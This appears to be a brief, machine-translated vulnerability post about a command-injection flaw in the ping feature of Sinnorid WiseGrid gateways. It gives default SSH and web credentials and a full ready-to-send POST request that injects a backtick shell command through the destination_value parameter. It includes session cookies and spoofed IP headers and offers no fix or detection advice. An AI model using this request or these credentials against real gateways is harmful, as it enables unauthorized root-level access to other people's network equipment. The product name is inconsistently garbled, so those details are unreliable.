Sinu Reed Wisegrid Huimin Application Delivery Gateway Sysadmin_action Php Background Command Execution Vulnerability
Sinu Reed Wisegrid Huimin Application Delivery Gateway Sysadmin_action Php Background Command Execution Vulnerability
#SinnoRid WiseGrid Huimin Application Delivery Gateway sysadmin_action.php Background Command Execution Vulnerability
Vulnerability Description
The corresponding ping function of WiseGrid WiseGrid Huimin application delivery gateway sysadmin_action.php has a background command execution vulnerability, and the system permissions can be obtained through the default password.
Vulnerability Impact
Sinnorid WiseGrid App Delivery Gateway
Network surveying and mapping
Vulnerability reappears
Login page
Default password
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
ssh:root/sinogrid
web: admin/sinogrid
POST /bin/sysadmin_action.php?action=getinfo&operation=ping&destination_value=`id`&ping_count=3&sar_value=3&netstat_value=tcp&interface= HTTP/1.1
Host:
Cookie: PHPSESSID=4510o12llugti8k4f24971rdf2; funcs=NNN; appversion=WiseGrid-V4.2.2R_17322; hbstate=alone; username=admin; passwordmd5=ef9ffdf6c1e2fe91d4e14b30323fb771; role=superadmin; authmode=LOCAL; session_time=1639643323; lang=zh; declaration=1; needSyn=false
Content-Length: 0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
X-Forwarded-For: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Connection: close
This post is licensed under CC BY 4.0 by the author.